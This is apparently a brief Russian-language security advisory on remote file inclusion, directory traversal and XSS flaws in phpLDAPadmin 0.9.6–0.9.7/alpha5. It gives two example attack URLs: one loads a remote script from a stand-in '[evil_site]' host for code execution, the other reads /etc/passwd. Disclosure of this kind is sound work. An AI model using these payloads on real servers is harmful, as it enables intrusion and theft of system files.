Программа: phpLDAPadmin 0.9.6 - 0.9.7/alpha5
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Пример:
http://[target]/[path]/phpldapadmin/welcome.php? custom_welcome_page=http ://[evil_site]/cmd.gif
Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога.
Пример:
http://[target]/[path]/phpldapadmin/welcome.php? custom_welcome_page=../../../../../../../../etc/passwd
Удаленный пользователь может также выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
